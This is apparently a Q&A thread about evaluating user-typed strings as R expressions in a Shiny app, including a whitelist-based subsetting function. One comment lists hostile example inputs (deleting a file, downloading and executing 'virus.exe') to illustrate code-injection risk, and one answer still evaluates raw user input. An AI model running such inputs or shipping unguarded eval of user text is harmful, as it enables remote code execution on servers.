# R: evaluate a string

Tags: r, metaprogramming, shiny

It has proved necessary to define a function `eval_string` which evaluates a string as if it were an expression(/call). For example, if:

```
string <- 'cyl == 6 & disp > 200'
```

I would want:

```
eval_string(string, mtcars)
```

to be equivalent to:

```
eval(quote(cyl == 6 & disp > 200), mtcars)
```

This is my attempt:

```
eval_string <- function(string, ...) eval(parse(text = string), ...)
```

which seems to work, however, I am aware `parse` is frowned upon, and do not have much experience with this type of programming (whatever it is?). So my question is: is there a more canonical way of achieving what I want? To put some context behind the question, `eval_string` will be used in conjunction with `shiny`; in particular, the `textInput` function.

Cheers for any help.

EDIT: thanks for the comments guys. As I am using the `textInput` to subset a data frame, with help from Hadley's guide, I have come up with this solution also:

```
library(pryr)

subset_with_string <- function(string, data) {
  expr <- parse(text = string)[[1]]
  subset_calls <- c("==", "!=", "&", "|", ">", "<", ">=", "<=", "(")
  legal_call <- all(fun_calls(expr) %in% subset_calls)                          
  if (legal_call) {
    data[eval(expr, data), ]
  } 
  else {
    stop('string does not induce a legal subset call to evaluate!')
  }
}

subset_with_string("(cyl == 6 & hp > 100) | gear == 4", mtcars)

subset_with_string("rm('importantFile.doc')", mtcars)
```

Comment: Evaluation of arbitrary user input is a legitimate use case of `eval(parse())`. However, I wouldn't feel comfortable with this due to the security concerns.

Comment: Hadley's Advanced R programming pages are good references for this type of programming; see for example http://adv-r.had.co.nz/Computing-on-the-language.html

Comment: Just make sure you can assume that the string doesn't include anything like `rm('importantFile.doc')` or `donwnload.file('http://billgates.com/virus.exe'); shell.exec('virus.exe')` or even `system('donate -money $1000 -to hackers')`

Comment: I don't think that `parse` is frowned upon for this specific purpose, it's discouraged because people tend to (mis)-use it when it isn't necessary. In your case, it would appear to be required.

Comment: Regarding @Roland's security concerns, there is a secure version of eval (eval.secure) in the RAppArmor package that executes in a sandbox, and can't exercise superuser rights unless the parent process has them.

Answer (score 1):

To avoid using eval I have the following in a Shiny app:

dat <- try(do.call(subset, list(data,parse(text = string))), silent = TRUE)

if(!is(dat, 'try-error')) return(dat)

Answer (score 0):

There's no way to "evaluate" a string (in the present sense) without parsing it. So if your input is a string then there's no way to avoid  `parse`.

See `subset.data.frame` for an idea how to do it without strings

[[EDIT]] But subset.data.frame basically `eval`-uates an expression in a data frame. So if for some reason you're not ok with `eval` and `substitute` (or their friends like `with` and  `within`) then it looks like then answer is no.